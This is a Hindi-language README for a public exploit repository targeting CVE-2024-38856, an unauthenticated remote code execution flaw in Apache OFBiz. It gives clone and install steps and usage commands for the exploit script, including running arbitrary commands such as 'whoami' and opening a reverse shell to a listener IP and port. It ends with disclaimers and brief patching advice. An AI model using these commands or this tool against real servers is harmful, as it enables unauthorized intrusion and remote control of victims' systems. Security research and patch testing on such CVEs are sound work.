
Apache OFBiz के लिए शोषण - CVE-2024-38856
Apache OFBiz (CVE-2024-38856) के लिए Exploit द्वारा: Alisson Faoli
इस रिपॉजिटरी में Apache OFBiz में पाई गई CVE-2024-38856 कमजोरी के लिए एक exploit है। यह दोष बिना प्रमाणीकरण के RCE (Remote Code Execution) की अनुमति देता है।
नोट: यह exploit केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। दुरुपयोग अवैध हो सकता है और इसकी पूरी जिम्मेदारी उपयोगकर्ता की है।
CVE: CVE-2024-38856
प्रभावित सॉफ्टवेयर: Apache OFBiz संस्करण 18.12.14 तक
कमजोरी का प्रकार: RCE
शोषण: प्रमाणीकरण आवश्यक नहीं
रिपॉजिटरी को क्लोन करें:
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit
निर्भरताएँ स्थापित करें:
pip install -r requirements.txt
exploit चलाएँ:
RCE:
python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"
SHELL:
python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444
इस कमजोरी को दूर करने के लिए, Apache OFBiz प्रशासकों को अनुशंसित किया जाता है: पैच किए गए संस्करण में अपडेट करें, जो https://ofbiz.apache.org/download.html पर उपलब्ध है। ज्ञात शोषण प्रयासों को अवरुद्ध करने के लिए फायरवॉल या WAF नियम लागू करें।
यदि आपके कोई प्रश्न हैं या exploit में सुधार की रिपोर्ट करना चाहते हैं, तो मुझसे संपर्क करें: LinkedIn: https://linkedin.com/in/alisson-faoli/
यह कोड केवल शैक्षिक उद्देश्यों और अधिकृत वातावरणों में सुरक्षा परीक्षण के लिए प्रदान किया गया है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।